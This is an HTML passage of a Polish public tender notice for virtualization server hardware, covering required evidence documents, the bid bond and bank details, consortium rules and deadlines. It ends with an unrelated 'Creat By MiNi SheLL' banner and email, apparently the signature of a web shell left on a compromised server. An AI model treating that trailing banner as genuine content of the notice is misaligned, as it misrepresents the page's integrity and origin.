zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 594), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej; Wzór oświadczenia stanowi Załącznik nr 3 do niniejszej SWZ; <br/>2.2.2.	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; <br/>2.2.3.	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 p.z.p. w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego. Wzór oświadczenia stanowi Załącznik nr 6 do SWZ.<br/><br/>3.	Dokumenty podmiotów zagranicznych: <br/>ROZDZIAŁ IX SWZ– &#34;INFORMACJA O OŚWIADCZENIU WSTĘPNYM I O PODMIOTOWYCH ŚRODKACH DOWODOWYCH&#34;- (str. 13 SWZ)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.1.	w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu: <br/>2.1.1.	w zakresie zdolności technicznej lub zawodowej: <br/>wykazu dostaw –wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania<br/>i podmiotów, na rzecz których te dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; Wzór wykazu stanowi Załącznik nr 5 do niniejszej SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> ROZDZIAŁ V SWZ– PRZEDMIOTOWE ŚRODKI DOWODOWE <br/> <br/>1.	Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych potwierdzających spełnienie przez oferowany przedmiot zamówienia wymagań określonych w Specyfikacji Warunków Zamówienia. <br/>2.	Przedmiotowymi środkami dowodowymi, o których mowa w pkt. 1 są: <br/>2.1.	Specyfikacja Techniczna Oferowanego Przedmiotu Zamówienia stanowiąca Załącznik Nr 1a do SWZ;<br/>2.2.	opis rozwiązań równoważnych – jeżeli Wykonawca przewiduje ich zastosowanie<br/>(w przypadku, o którym mowa w Rozdziale XVI pkt 17 SWZ) oraz dokumenty na potwierdzenie równoważności zastosowanych rozwiązań (jeżeli są konieczne do wykazania równoważności).<br/>2.3.	aktualny certyfikat lub inny dokument równoważny potwierdzający, że serwer do wirtualizacji jest produkowany zgodnie z normami ISO-9001, ISO-50001 oraz ISO-14001 (lub normami je zastępującymi); <br/>2.4.	certyfikat lub inny dokument równoważny potwierdzający, że oferowana macierz dyskowa jest produkowana zgodnie z normami ISO-9001 oraz ISO-14001 (lub normami je zastępującymi); <br/>2.5.	deklarację zgodności z oznakowaniem CE dla serwera do wirtualizacji, macierzy dyskowej i switcha zarządzalnego;<br/>2.6.	oświadczenie producenta potwierdzające, że zaoferowany serwer do wirtualizacji jest wyposażony w rozwiązanie zapewniające ochronę oprogramowania układowego przed manipulacją złośliwego oprogramowania i że ochrona ta jest zgodna z zaleceniami NIST SP 800-147B i NIST SP 800-155, a także posiada zaimplementowane sprzętowo mechanizmy kryptograficzne poświadczające integralność oprogramowania BIOS (Root of Trust). <br/>2.7.	wydruk ze strony internetowej www.epeat.net lub inny dokument potwierdzający spełnienie normy co najmniej Epeat Silver według normy wprowadzonej w 2019 roku dla serwera do wirtualizacji potwierdzające, że zaoferowane produkty zawierają informacje dotyczące ponownego użycia i recyklingu, nie zawierają farb i powłok na dużych plastikowych częściach, których nie da się poddać recyklingowi lub ponownie użyć. Wszystkie produkty zawierające podzespoły elektroniczne oraz niebezpieczne składniki powinny być bezpiecznie i łatwo identyfikowalne oraz usuwalne. Usunięcie materiałów i komponentów powinno odbywać się zgodnie z wymogami Dyrektywy WEEE 2002/96/EC. Produkty muszą składać się z co najmniej w 65% ze składników wielokrotnego użytku/zdatnych do recyklingu. We wszystkich produktach części tworzyw sztucznych większe niż 25-gramowe powinny zawierać nie więcej niż śladowe ilości środków zmniejszających palność sklasyfikowanych w dyrektywie RE 67/548/EEC;<br/><br/>3.	Wszystkie środki przedmiotowe wystawione w języku innym niż język polski powinny posiadać tłumaczenie na język polski. Tłumaczenie w/w może dokonać Wykonawca samodzielnie.<br/>4.	Wszystkie środki przedmiotowe sporządzone przez Wykonawcę muszą zostać podpisane podpisem elektronicznym dozwolonym w niniejszej SWZ. Przedmiotowe środki dowodowe (PrŚD) nie muszą być podpisane elektronicznie przez Wykonawcę, jeśli zostały wystawione jako dokument elektroniczny przez upoważniony podmiot (np. producenta), ponieważ wtedy przekazuje się je w tej oryginalnej formie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> (numeracja punktów jak w ROZDZIALE V SWZ– PRZEDMIOTOWE ŚRODKI DOWODOWE )<br/><br/>5.	Uzupełnienie środków przedmiotowych nastąpić może w przypadkach, gdy Wykonawca:<br/>5.1.	nie złoży przedmiotowych środków dowodowych,<br/>5.2. złoży niekompletne przedmiotowe środki dowodowe.<br/>6.	Zamawiający informuje, iż uzupełnienie przedmiotowych środków dowodowych nie podlega na zmianie nazwy producenta i modelu, wersji sprzętu lub oprogramowania zaoferowanego w złożonej ofercie. <br/>7.	Uzupełnienie nie jest możliwe, gdy dokumenty ofertowe Wykonawcy zawierają informacje, które nie potwierdzają zgodności z wymaganiami określonymi przez Zamawiającego w niniejszej SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> (ROZDZIALE XV - OPIS SPOSOBU PRZYGOTOWYWANIA OFERTY)<br/>1.	Wykonawca zobowiązany jest złożyć Zamawiającemu Ofertę zawierającą następujące dokumenty: <br/>1)	Formularz Ofertowy - Załącznik Nr 1 do SWZ,<br/>2)	Specyfikację Techniczną Oferowanego Przedmiotu Zamówienia – uzupełniony Załącznik Nr 1a do SWZ,<br/>3)	Dokumenty przedmiotowe – określone w Rozdziale V pkt 2 SWZ,<br/>4)	OŚWIADCZENIE Wykonawcy, o którym mowa w Rozdziale IX pkt. 1 – Załącznik Nr 2 do SWZ, <br/>5)	(jeżeli dotyczy) OŚWIADCZENIE podmiotu udostępniającego zasoby o którym mowa w Rozdziale VIII pkt. 4.8. – Załącznik 2a do SWZ, <br/>6)	(jeżeli dotyczy) oświadczenie Wykonawcy wspólnie ubiegającego się o udzielenie zamówienie, składane na podstawie art. 117 ust 4 ustawy p.z.p., o którym mowa w Rozdziale VIII pkt. 5.8. - Załącznik nr 9 do SWZ, <br/>7)	(jeżeli dotyczy) zobowiązanie podmiotu udostępniającego zasoby lub inne dokumenty -zgodnie z Rozdziałem VIII ust. 4.5. - Załącznik nr 7 do SWZ, <br/>8)	potwierdzenie umocowania osoby podpisującej Ofertę do działania w imieniu Wykonawcy lub podmiotu udostępniającego zasoby.<br/>9)	(jeżeli dotyczy) Pełnomocnictwo dla pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>2.	Przed zawarciem umowy Wykonawca będzie zobowiązany do: <br/>1)	przedłoży Zamawiającemu dokumenty potwierdzające, że podmiot realizujący serwis sprzętu posiada autoryzację producenta sprzętu oraz certyfikaty ISO 9001:2015 oraz ISO-27001 na świadczenie usług serwisowych;<br/>2)	przekazania Zamawiającemu kopii umowy, jeżeli zamówienie będzie realizowane przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) w terminie umożliwiającym Zamawiającemu zapoznanie się z jej treścią i ocenę zgodności z zapisami w niniejszej SWZ. <br/>3)	wniesienia zabezpieczenia należytego wykonania umowy w wysokości i formie określonej w Rozdziale XX SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> ROZDZIAŁ XIV - WYMAGANIA DOTYCZĄCE WADIUM. <br/>1.	Wykonawca wnosi wadium przed upływem terminu składania ofert w wysokości 3000,00 PLN (słownie: trzy tysiące złotych).<br/>1.1.	Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>1.2.	pieniądzu; <br/>1.3.	gwarancjach bankowych; <br/>1.4.	gwarancjach ubezpieczeniowych; <br/>1.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2024 r. poz. 419). <br/>2.	Wadium wniesione w pieniądzu należy złożyć przelewem bankowym na rachunek bankowy Zamawiającego : <br/>CODE SWIFT: GBWCPLPP <br/>IBAN: PL nr 37 9271 0005 0000 0228 2000 0250 <br/>w tytule wpisując: „ZP.271.08.2025 – wadium”<br/><br/>Za termin wniesienia wadium w formie pieniężnej uznaje się datę uznania środków na koncie Zamawiającego (dzień, godzina). <br/><br/>3.	W przypadku złożenia wadium w innej formie niż pieniężna, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>4.	Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności: <br/>4.1.	upływu terminu związania ofertą; <br/>4.2.	zawarcia umowy w sprawie zamówienia publicznego; <br/>4.3.	unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>5.	Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium Wykonawcy: <br/>5.1.	który wycofał ofertę przed upływem terminu składania ofert; <br/>5.2.	którego oferta została odrzucona; <br/>5.3.	po wyborze najkorzystniejszej oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza; <br/>5.4.	po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>6.	Złożenie wniosku o zwrot wadium, o którym mowa w pkt. 5, powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w rozdziale XXIII SWZ. <br/>7.	Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. <br/>8.	Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium. <br/>9.	Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, w okolicznościach wskazanych w art. 98 ust 6 p.z.p.. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> (ROZDZIAŁ VIII SWZ)<br/>5. Wspólne ubieganie się o udzielenie zamówienia (np. konsorcja, spółki cywilne).<br/>5.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>5.2.	W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>5.3.	Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy. <br/>5.4.	Dokument potwierdzający ustanowienie pełnomocnictwa powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej. <br/>5.5.	Wszelka korespondencja kierowana będzie wyłącznie do podmiotu występującego jako pełnomocnik. <br/>5.6.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>5.6.1.	żaden z tych Wykonawców nie może podlegać wykluczeniu w okolicznościach, o których mowa w Rozdziale VII. <br/>5.6.2.	warunki udziału w postępowaniu określone w Rozdziale VIII winien spełniać co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy występujący wspólnie. <br/>5.7.	Celem wykazania braku podstaw do wykluczenia, o których mowa w Rozdziale VII oraz spełnienia warunków udziału w postępowaniu o których mowa w Rozdziale VIII Wykonawcy składają oświadczania i dokumenty określone w rozdziale IX, w sposób i w trybie tam określonym. <br/>5.8.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty podmiotowy środek dowodowy stanowiący oświadczenie, z którego wynika, które dostawy /prace wykonają poszczególni Wykonawcy (zgodnie z art. 117 ust. 4. p.z.p.) – Załącznik Nr 9 do SWZ. <br/>5.9.	Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców przed przystąpieniem do podpisania umowy o zamówienie publiczne. Termin, na jaki winna być zawarta umowa Wykonawców występujących wspólnie, nie może być krótszy od terminu określonego na wykonanie zamówienia. <br/>5.10.	Umowa regulująca współpracę Wykonawców składających wspólnie ofertę nie może być umową przedwstępną ani umową zawartą pod warunkiem zawieszającym i powinna określać <br/>w szczególności: <br/>5.10.1.	podmioty składające ofertę i podpisujące umowę; <br/>5.10.2.	cel gospodarczy, dla którego została zawarta umowa; <br/>5.10.3.	zasady reprezentacji i prowadzenia spraw, w tym wskazania podmiotu odpowiedzialnego <br/>5.10.4.	za prowadzenie rozliczeń z Zamawiającym (wystawienia faktur); <br/>5.10.5.	oznaczenie czasu trwania umowy (wymaga się, aby czas trwania umowy był nie krótszy niż okres realizacji zamówienia oraz okres gwarancji jakości i/lub rękojmi); <br/>5.10.6.	zakres i wartość dostaw realizowanych przez poszczególnych członków konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy, które zostaną wprowadzone do treści zawieranej umowy zostały zawarte we wzorze umowy, który stanowi Załącznik nr 4 do SWZ.<br/>2. Wzór każdej umowy szczegółowo przewiduje i określa warunki zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6f37dbbc-7c2b-464e-adbf-47da7dcc131d</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-17 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. ROZDZIAŁ VI - TERMIN WYKONANIA ZAMÓWIENIA.<br/> <br/>1.1. Wykonawca jest zobowiązany wykonać zamówienie w terminie do 30 dni od daty zawarcia umowy.<br/>1.2. Potwierdzeniem wykonania przedmiotu zamówienia jest podpisanie przez obie strony protokołu przekazania przedmiotu umowy.<br/><br/>2. postępowania o udzielenie niniejszego zamówienia WYKLUCZA SIĘ TAKŻE Wykonawcę w przypadku zaistnienia<br/>okoliczności przewidzianych w art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2025<br/>poz. 514) – dalej „ustawa UK” tj.:<br/>2.1. wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę<br/>na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy<br/>UK;<br/>2.2. którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy<br/>oraz finansowaniu terroryzmu (t.j. Dz.U. z 2025r. poz. 644) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od<br/>dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy UK;<br/>2.3. którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (t.j.<br/>Dz.U. z 2023 r. poz. 120 z późn. zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został<br/>wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art.<br/>1 pkt 3 ustawy UK.<br/>3. Tajemnica przedsiębiorstwa – sposób składania ROZDZIAŁ XV pkt 7. ponadto pkt 20. <br/>4. WYMAGANIA DOTYCZĄCE ZABEZPIECZENIA NALEŻYTEGO WYKONANIA UMOWY - ROZDZIAŁ XX SWZ (str.24)

Creat By MiNi SheLL
Email: jattceo@gmail.com